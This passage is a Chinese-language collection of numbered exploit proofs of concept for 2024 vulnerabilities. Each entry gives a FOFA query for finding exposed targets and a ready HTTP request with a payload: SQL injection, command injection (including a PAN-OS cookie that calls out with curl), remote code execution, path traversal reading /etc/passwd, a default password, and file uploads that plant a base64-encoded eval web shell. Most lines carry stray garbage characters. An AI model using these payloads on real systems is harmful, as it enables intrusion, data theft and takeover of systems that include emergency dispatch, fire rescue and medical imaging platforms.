GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
' N, E' I3 E2 Z5 K8 EHost: x.x.x.x& L$ w4 n$ q0 g; U- P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 S, a q8 ]) U0 yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& l% b* R$ T0 E. A& GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* t0 n7 G0 b3 u4 a' |Accept-Encoding: gzip, deflate, br& n+ b) l3 s/ Q5 ^
Connection: close: u8 P0 X' _' F4 J! [5 ]
Upgrade-Insecure-Requests: 1( W: B. y, O1 M5 J" x* Y
. T: W+ D- |$ W9 @
% z# d5 a( Y9 L7 L: R( }& ? p
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
$ _5 h3 H% O g- Z& ]$ a& w# PCVE-2024-2622; I$ z4 E+ j v
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台". _& `+ v. G# g, O
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
. U3 z( L! R7 G! hHost: x.x.x.x
: f6 k% X- l/ f/ l" q2 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
9 J4 H' g8 F; I2 sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! [ j; u% s; Y6 \, ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 c' ?1 ?4 H5 `! y! mAccept-Encoding: gzip, deflate, br* g9 E2 f* s# t
Connection: close
/ z# o! U) ?6 S. I+ G* f7 ?% gCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
1 b7 N0 } }8 {# y! F8 iUpgrade-Insecure-Requests: 15 V5 Y0 o8 u( d% T6 o# l
/ Y4 o$ x- T5 D+ @. H2 t- g
5 [0 T$ Q& Y; @* M1 a! Q% }! O140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入6 Y, C) d+ _* j! f& @* u! {
CVE-2024-2566
8 g/ D1 W( R- k9 y! s5 v6 gFOFA:body="app/structure/departments.php" || app="指挥调度管理平台", q* A; J' Z K7 k8 d- D" r0 G
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1+ k F3 s- x D4 P) o# @$ q
Host: x.x.x.x
& m% V, u% Q) b* [# bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.07 q7 A# i2 Z7 W: D" g2 V5 F4 k8 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. ]6 y/ l# d7 Z; |/ j6 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ S7 t! v, c y" n& ~Accept-Encoding: gzip, deflate, br) u4 A! g5 W- [
Connection: close+ ?) w2 ?- Q9 d2 ^
Cookie: authcode=h8g9$ ^ T* G9 z# K; z) _/ |
Upgrade-Insecure-Requests: 1 U) I& [8 m6 ?& R6 {, l
" U- ^! B" c5 |
. i2 n* u% j* v: ]# W9 U141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
( y, E; ^0 o; s1 V. z8 ~2 p0 X5 LFOFA:body="指挥调度管理平台"4 v# [8 h% t/ \ K
POST /app/ext/ajax_users.php HTTP/1.1) T1 t- O# s3 Z Z( j
Host: your-ip
* ~' W5 r2 Y( j' D* `% i9 hUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info" \& J6 ^8 \# C* k J4 l
Content-Type: application/x-www-form-urlencoded
8 O7 ]3 p, m3 x* V7 i; G4 n; X- f& n* b
7 B# V; I6 }- n3 [" N( udep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
y" D c' |7 \! W) R! S
. c0 z$ o4 P' ?4 n: U5 X) T$ B7 F; l- B% d! [& M0 c
142. CMSV6车辆监控平台系统中存在弱密码3 _8 q7 b% N2 ^. p( A/ n7 T6 M
CVE-2024-296663 l/ ^% k- Q1 {; ^% o
FOFA:body="/808gps/"
) A1 Q! }7 J1 |2 y% Badmin/admin+ G# e" t! {) o
143. Netis WF2780 v2.1.40144 远程命令执行
7 Y9 J2 P; z3 |, f6 k8 D: x' tCVE-2024-25850, Y$ @3 w: D1 G) w8 c/ w9 j' T' {% O
FOFA:title='AP setup' && header='netis'+ `: D4 C8 C+ B
PAYLOAD! I! Z2 v: S+ ]
+ R6 d: D; C% ~; s& p8 [144. D-Link nas_sharing.cgi 命令注入
! M6 m1 D+ V+ H. l* F9 n# {FOFA:app="D_Link-DNS-ShareCenter"4 H0 S- l% Z3 j y0 X9 f
system参数用于传要执行的命令
4 z6 k7 b2 h0 k3 Y" A, HGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
. E& n/ V. g4 ?# p& gHost: x.x.x.x
1 v, e& U* W. kUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.09 G4 x+ c, Q$ x9 A; h+ V
Connection: close6 W+ S) F3 x# B+ M9 t7 g- N! n8 D8 E
Accept: */*. Y2 \5 o5 [, N& ~# H( S
Accept-Language: en
" }' H* B* R/ p# P( @: oAccept-Encoding: gzip3 d, R& v8 d; i! F5 c
/ W+ ~* M7 e3 j i: {5 i) l, V' ~( w3 A" o
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
: q( z& A0 l) T" |- N* |# r) bCVE-2024-3400
( Y \4 o2 n0 d* z3 z# S3 fFOFA:icon_hash="-631559155"
, i6 ~; v& A$ ~2 ?. I6 |2 h1 ZGET /global-protect/login.esp HTTP/1.1! k' E) Y N+ X( z
Host: 192.168.30.112:10053 q3 J2 H7 R6 Y- O9 p. y) A8 P! M j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84* a: X8 e! l# ~( Y; C& i
Connection: close
$ H/ r8 w, X/ p0 G- Q' F5 X6 dCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;: w Y8 \/ _+ F/ }/ ^5 x
Accept-Encoding: gzip
; x0 C6 F3 l9 R. Z2 f' d
# U; r1 ? W! K |
# l( S, r% S G+ g& V' z. F146. MajorDoMo thumb.php 未授权远程代码执行
3 L% w8 W6 s. N( o7 yCNVD-2024-02175
4 D- I9 Z5 I A" VFOFA:app="MajordomoSL"
6 j1 f, o8 U! w5 E0 _GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.10 d* Y9 A1 y$ C' z( h, o. o
Host: x.x.x.x; C4 b- c2 l3 Q& @% _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.846 E3 o) ] L* U( Q: [0 \& y" X5 S( K
Accept-Charset: utf-8* m, y4 V$ q! E0 E
Accept-Encoding: gzip, deflate, \) M4 r; w7 G$ _
Connection: close
. O1 d g( l l. B4 x. C. e3 }5 X7 q# d$ {2 o- q, X. V+ {: f
( b s H7 C$ ^. I$ w2 N* `7 M
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历3 B7 g) A; o+ P9 x
CVE-2024-32399. a. Y2 B; @6 c
FOFA:body="RaidenMAILD"1 q) i2 D3 o0 y/ l/ \! m
GET /webeditor/../../../windows/win.ini HTTP/1.1
0 W! ~- t. @- O, ]4 hHost: 127.0.0.1:81
! G, x( @7 c2 E YCache-Control: max-age=0( p G( r. f7 o; n
Connection: close
2 Q4 l4 y4 |: _. h( s* N4 } V2 V. _+ L5 N3 y' |
/ C9 F. E# L) }$ W2 r2 A
148. CrushFTP 认证绕过模板注入9 M9 H7 |) o3 N. R
CVE-2024-40403 A" Z. e/ J2 C4 K
FOFA:body="CrushFTP"+ R' Z* x& L9 |! L, C. O
PAYLOAD! j* U/ O8 }" u$ C
% Y" K3 [8 P# f- W149. AJ-Report开源数据大屏存在远程命令执行
2 d. V( I% B, _0 WFOFA:title="AJ-Report"
2 B" H* U) ~& e1 E! ^3 O) |! e# C4 ? G! D* `3 q+ H
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1- }6 |& Z4 K9 `+ ]/ U% W( K
Host: x.x.x.x) V5 A$ E! f0 ^ F( F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& t' c: g8 N" [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- v# P7 E$ R7 M
Accept-Encoding: gzip, deflate, br/ G' C. a* t+ i. M! r& C! f
Accept-Language: zh-CN,zh;q=0.9' q0 |' P+ I/ a! l) `, o& q; ~* G
Content-Type: application/json;charset=UTF-8
$ v0 P) S; E1 ^: {Connection: close+ m( I+ N: h- G, s3 o) w) _
+ |8 v6 t3 w0 v. B* b$ `$ n* g7 R# [
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}2 C2 q( I. y. h: h$ t( t z0 m
/ |6 C! g& Y* Y }0 x
150. AJ-Report 1.4.0 认证绕过与远程代码执行6 Z0 \3 k" p+ {; \+ u
FOFA:title="AJ-Report"9 X# d+ r8 x. D7 a$ ~" M0 F
POST /dataSetParam/verification;swagger-ui/ HTTP/1.10 S$ F2 ?" q. J, o( L& @
Host: x.x.x.x) w* b6 V/ t$ t. B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.367 w2 n2 O. U& ?5 r* U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! B* y6 |7 e1 }; _+ eAccept-Encoding: gzip, deflate, br. R" p% f& T- M% x9 D/ E- \
Accept-Language: zh-CN,zh;q=0.9
7 E1 ~. K, Z; P$ J: p% O. E$ q! ]Content-Type: application/json;charset=UTF-89 @: N0 N6 j" }, l
Connection: close4 Y: ~2 z/ L$ s( `
Content-Length: 339" N8 [4 ?. C' @+ [$ X7 z6 Y
+ C: e/ x7 G" C/ E* X# b
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
, g' ?- F. q" h/ G- ]! I; k1 r* \; X
5 S+ n0 {0 S( {* `, M) a( v7 n3 k/ a. U6 a1 o3 P3 W% P! K1 s
151. AJ-Report 1.4.1 pageList sql注入! [4 _9 j- u, p3 F/ J# l* X4 A/ K
FOFA:title="AJ-Report"
4 C) T; r) e7 J2 J* |* v, t" ?8 g$ f3 rGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.15 g0 k% Q; ]6 o+ o2 V/ E
Host: x.x.x.x" @0 ^" n/ u" r/ N+ J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 }( s" ^1 p( Y) b: Z$ _/ |" z" |Connection: close
# P% C( o: |$ |Accept-Encoding: gzip' }$ _5 i$ b* c7 ?, g; o6 z& y @
& h$ q# M7 n; N9 P" D5 ]6 T4 P8 A2 x2 ?1 [" U2 M* v
152. Progress Kemp LoadMaster 远程命令执行6 O" w% z! _# j5 N7 d
CVE-2024-12129 c6 u/ y7 z( k7 M8 _
LoadMaster <= 7.2.59.2 (GA)! ~2 S3 \3 W! n2 I" N/ q
LoadMaster<=7.2.54.8 (LTSF)% A$ Y y' F5 h6 s9 T9 B/ ^6 m7 \5 n3 X
LoadMaster <= 7.2.48.10 (LTS)
9 [- u+ p3 `* YFOFA:body="LoadMaster"& y d8 s7 r! ?% E: f6 D0 B
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码( u6 s0 T& Z) O' _, ~& [ @
GET /access/set?param=enableapi&value=1 HTTP/1.1
/ a7 ~7 b, V( }Host: x.x.x.x. y+ D$ y9 _- V) P$ K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
0 B: {/ b) z: o9 E% aConnection: close
- |) O' A4 l; O6 o% P7 Q4 i/ QAccept: */*
1 I! C+ W2 h3 s( q% IAccept-Language: en! M4 ?: @2 V$ }8 n
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI= R4 Q H! f" t( _) `6 N
Accept-Encoding: gzip2 b1 V" C3 a6 r1 X. G; `
; V8 L; P8 Q. x8 g8 R# K8 `. X& d
! v$ C( o6 G' l+ L% [
153. gradio任意文件读取% ?" J( k3 H5 `. a. C
CVE-2024-1561FOFA:body="__gradio_mode__"( k: }% l% K6 r' x8 x
第一步,请求/config文件获取componets的id( M s+ U8 t: X% ]3 ?) }, C
http://x.x.x.x/config0 T3 A: Q, E' v1 t. e3 d% ]
; n8 \0 I1 { u6 H' M0 |% k0 ~2 X. g; ~6 O4 U! L
第二步,将/etc/passwd的内容写入到一个临时文件
8 c" u, g' f7 \4 O8 mPOST /component_server HTTP/1.1# {: T0 s$ x% ]* m0 R
Host: x.x.x.x
3 S5 K- T% K# r- W9 R" NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3# p" l( e2 a& G, [3 ? \) H
Connection: close% t: Q; h# p! o& |
Content-Length: 115
% _8 M3 D, h2 F5 D% H! z( K; T4 u2 XContent-Type: application/json& \; x- }: H& U5 i, t$ J
Accept-Encoding: gzip, {2 ]6 v& W) E: s6 w7 \
$ S$ g- b( ~. N8 S" a( J{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}' X7 g7 W: ]) G0 k S
' D0 _4 u( f+ s( J+ j
4 A, B- s3 K) D3 ]( e( P5 E5 v
第三步访问
8 {, K, ?" |4 D6 [ _. e, {9 Lhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
7 j4 l& j1 C2 V6 q% F2 h
' B) e4 _. h: E J5 v
# z) x$ b# O, }/ b9 s: g154. 天维尔消防救援作战调度平台 SQL注入
, g. D2 E9 \8 VCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入", @3 A/ L" h/ p3 z
POST /twms-service-mfs/mfsNotice/page HTTP/1.19 u( Z: r& M% J- m. t) m5 p4 `0 Z0 D
Host: x.x.x.x
) w" F! ^5 e0 Y# }: u' x9 yContent-Length: 106" b6 c6 ]: E' U5 Y
Cache-Control: max-age=0
8 q, g" L$ L1 Z4 x: R' XUpgrade-Insecure-Requests: 18 t, `1 ?; P: k6 ?
Origin: http://x.x.x.x' u% Q {/ `! l4 z# G: Y1 S6 }
Content-Type: application/json0 T$ X! X" _& z9 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' a6 K& @. h$ c+ x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- I: ?1 p( l1 `- ZReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page; H) F1 [: V3 s {1 l
Accept-Encoding: gzip, deflate3 j% W+ |6 l1 G- N
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7+ c$ p( @+ \& r: D) g/ s+ @
Connection: close
: w+ ` W* @' b3 f; c1 U5 |' B" ^
$ Z9 n/ }' E0 F" ]2 r3 o8 p; Y G$ ~; E0 T/ O{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
6 K1 A! h5 k; S6 M
$ w' A# \4 [* Z4 W: n! H6 e9 Q: }( `
155. 六零导航页 file.php 任意文件上传7 H$ J8 A d D, h) A# e
CVE-2024-349826 d- @2 o% N, p3 |0 s
FOFA:title=="上网导航 - LyLme Spage"" C' a2 L1 S& p B- v$ y, |
POST /include/file.php HTTP/1.13 F7 N. y' O7 `& Q- Y
Host: x.x.x.x
% A$ C: S6 o0 S' |7 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0( B+ Y9 }0 `2 E
Connection: close7 ~; o( ]* F, C
Content-Length: 232. \+ i' t3 {& V% n
Accept: application/json, text/javascript, */*; q=0.01& P, p/ ^+ z) n% }$ E
Accept-Encoding: gzip, deflate, br6 D3 c+ a/ G. y# z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 m! t* S! Y" yContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f9 q4 D# M0 b, x/ a- z
X-Requested-With: XMLHttpRequest$ P- ?; @: i9 ~% `) N
" J" u& f( N# b ^6 A7 }-----------------------------qttl7vemrsold314zg0f
# M6 l- c V* E" e& {. lContent-Disposition: form-data; name="file"; filename="test.php"
, P2 R I$ G# q" j# Q: [1 @% J; ?! ]Content-Type: image/png+ {0 J* [* Y% e" K3 z
, D7 ]4 H% S3 V4 i# _" B+ `
<?php phpinfo();unlink(__FILE__);?>* x! c n% p! T% Z! x6 _1 f; J1 E
-----------------------------qttl7vemrsold314zg0f--* m' h; M# d2 F! s
9 _ U" G) ?* }. l$ @/ r
! H+ Y3 u4 a6 m9 U+ e t访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
6 E7 ]! _: r7 Q& L5 `: M5 H5 `# s0 B1 Z/ z, ]
156. TBK DVR-4104/DVR-4216 操作系统命令注入" m9 [$ E+ r/ q- |8 r
CVE-2024-3721
" l0 D1 V' F$ Q# j, l& d; w6 a/ ~FOFA:"Location: /login.rsp"$ |) ^& {/ y( k" S1 i
·TBK DVR-4104
" A7 m G; e5 f6 R1 t' d c% v5 e·TBK DVR-4216
8 w, I# y4 i- C, Fcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1") c: N- T- |0 j) D
: n4 B7 ~$ b4 e1 |) L: I5 R: F# U6 Y F! ?! ]$ f7 L& D4 r
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.14 u# a" D, w5 \5 }8 \- z
Host: x.x.x.x+ L4 ?2 p7 B7 [8 h6 ?+ q0 J' s/ x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# q0 \' G# Q7 W( uConnection: close0 C, ^6 K0 g. A$ j3 ^; f3 |0 Z
Content-Length: 02 t% e9 }: m! X* \: i0 \
Cookie: uid=1
7 H' g/ M5 `2 c# }Accept-Encoding: gzip
9 n/ f2 @8 I- Q3 J% Z
. t. k9 w8 l: o
: u' H, w+ V5 Z% ] F& U/ c3 a4 @% |157. 美特CRM upload.jsp 任意文件上传: k! C4 m/ u! h9 r2 A7 s/ W3 F
CNVD-2023-06971
3 o) [2 L* x6 M+ ~FOFA:body="/common/scripts/basic.js"0 X% c9 t& e) i4 K! t. m
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
, O2 ?, x( k9 y! n9 o) {Host: x.x.x.x- X/ C4 X. R. d. s' x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
( r/ F% K$ _* u( ^Content-Length: 709! Z4 t: e; V, m2 k; Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 d6 ~* c: \3 x* ^Accept-Encoding: gzip, deflate) |! H* j' f' C# h
Accept-Language: zh-CN,zh;q=0.90 M- C3 h3 O, ~# q9 \7 |
Cache-Control: max-age=05 i" f+ p8 L" X
Connection: close
1 h' T1 d* z! ~$ h+ w" ^* \Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN; j7 }# r/ q0 H5 c0 ]) n
Upgrade-Insecure-Requests: 1
# |+ @" Z' \& J, t) T8 D- ~1 t" W" c8 a
------WebKitFormBoundary1imovELzPsfzp5dN* r: b5 U. ~+ \' ^! t
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"' V. h: ~. r3 R7 X
Content-Type: application/octet-stream
6 Z* C# c, k9 q+ }" j! N- W
: z- t- C& Y* P; @7 }! H# @' znyhelxrutzwhrsvsrafb
) ~, r# F% k& \; \- \5 T! M+ r------WebKitFormBoundary1imovELzPsfzp5dN+ K9 I1 s( t: z7 A9 C( ~" d5 z
Content-Disposition: form-data; name="key"
( I# ?# I) n b# E$ P' M" Y" m
6 Z; H2 E, P0 N2 ?5 ?null8 o. g( S4 t/ R# N
------WebKitFormBoundary1imovELzPsfzp5dN
6 S) ~/ Q$ T: b1 y4 r& z* G0 `& yContent-Disposition: form-data; name="form": U2 i4 m) P! g s2 }# \6 z
/ _2 c& B! \2 a# r- Znull
) d" T4 C" q& V6 B4 ?% I* M------WebKitFormBoundary1imovELzPsfzp5dN7 b8 C2 |8 j; w+ h6 E
Content-Disposition: form-data; name="field") G/ U' F; B' q; n. X
/ n# i. n3 C$ r' F! f
null! Y* f/ x" L4 L/ N
------WebKitFormBoundary1imovELzPsfzp5dN0 Q( P: u/ T Z2 |
Content-Disposition: form-data; name="filetitile"- T: N+ N' z7 d: j$ ?0 B
. A9 V0 }' ^4 v' w" Wnull
0 c: L2 s1 [; O6 d$ F4 m- x" D% G------WebKitFormBoundary1imovELzPsfzp5dN
; \# M- x4 e0 @8 kContent-Disposition: form-data; name="filefolder"/ O; t: `+ ^! C. b" \# o
6 [4 [# H |( y
null7 P0 \; k7 I# @, B# r* O/ C% |
------WebKitFormBoundary1imovELzPsfzp5dN--, P% O% I; R+ `8 L$ e' l& V: v- b
: `0 {8 L6 Y4 D% O$ s: f0 v, B7 S, z5 \- X6 T
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
: |. g5 \& j8 Q
9 B: d9 J9 Y$ B! R158. Mura-CMS-processAsyncObject存在SQL注入4 Q! o, Y% l+ t9 P* V
CVE-2024-32640
- A: m( G1 t* |) ~3 M" X' R2 S2 QFOFA:"Generator: Masa CMS"
/ U" M( L+ U- E. r+ V1 _- E9 KPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
( W2 H6 }, K$ O. i, G8 G" F' r. KHost: {{Hostname}}9 w3 `' l- h: K; h) b1 C& U ]
Content-Type: application/x-www-form-urlencoded
1 d9 p4 x* q( @( Z. l
! }3 U# n3 q' i" e' robject=displayregion&contenthistid=x\'&previewid=12 d2 _: x1 J" c) t& a9 z2 [$ `
5 ^# }3 j% l5 Q
1 J8 u" G$ p0 X5 ~2 a. Z159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
/ ^5 |- q3 ~$ [, d3 V$ O' d- JFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
' x# b0 G) k; D* W6 xPOST /webservices/WebJobUpload.asmx HTTP/1.1
2 ]' D% b8 p) ` DHost: x.x.x.x( Z' X0 w5 n( }: h2 `4 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.363 N# P9 d+ p" O4 G& G, }; ?
Content-Length: 1080
; h# z1 K! b: ]8 AAccept-Encoding: gzip, deflate; e7 {; X- p& y; j1 }7 r
Connection: close
, }" j3 y1 P' I& ]+ W" D! @5 `8 TContent-Type: text/xml; charset=utf-8
7 K: R; Q/ q5 fSoapaction: "http://rainier/jobUpload"7 M1 a" n+ u+ e" D! d
' v; M' E) ^$ J) w- I/ t<?xml version="1.0" encoding="utf-8"?>
5 P/ R M# X( U9 Y1 e<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">9 ^" h$ c$ D8 q4 P1 j: V6 o* \
<soap:Body>8 c2 X7 \ t9 M$ _) d
<jobUpload xmlns="http://rainier">
0 T3 E0 c8 z6 Q8 d<vcode>1</vcode>
+ n5 f ?# r4 P: Y/ Q' r<subFolder></subFolder> J y; o8 r. Y+ k' z6 R
<fileName>abcrce.asmx</fileName>
0 Y6 k5 K. Z- K/ D' Y<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
& `7 m0 H m* W2 D: R' C! n9 H</jobUpload>4 Z o% C. W+ ?: B
</soap:Body>
b( D" V+ B: U</soap:Envelope>% ?8 i; T, P: c1 i" ~
" V; @0 J* V' j" B9 L5 ~
1 M$ u m6 X) U! O5 {% \
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
3 S! u, ]8 n- T) h! Y6 O
. y6 `8 _& e, D t" A+ N
. W4 ?; O! u' i% \5 l* @# h160. Sonatype Nexus Repository 3目录遍历与文件读取3 S3 C: d* q- C% ?& l$ b2 l# X
CVE-2024-49560 m* A/ X1 ~; J2 k Y9 ~
FOFA:title="Nexus Repository Manager"6 Z. z+ W% }0 O0 Y( ]) g
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
8 b [" I: \- f3 @: |# h- P) lHost: x.x.x.x
; R( O5 n, E' k7 W7 {User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0, ^4 g, w# q6 k! t
Connection: close
I. u6 t' q+ k$ b+ ^0 i7 G3 \$ MAccept: */*: @8 A8 a$ V! C+ V% b
Accept-Language: en) l/ d4 p. N3 j; m
Accept-Encoding: gzip
' i0 h# `1 t* }
+ U8 w, D6 Z: M" m& U. O& x
% t0 r8 x8 v6 U161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传, b& |4 ~, C# H) o2 f
FOFA:body="/KT_Css/qd_defaul.css") O8 B( Q( |* s5 `
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
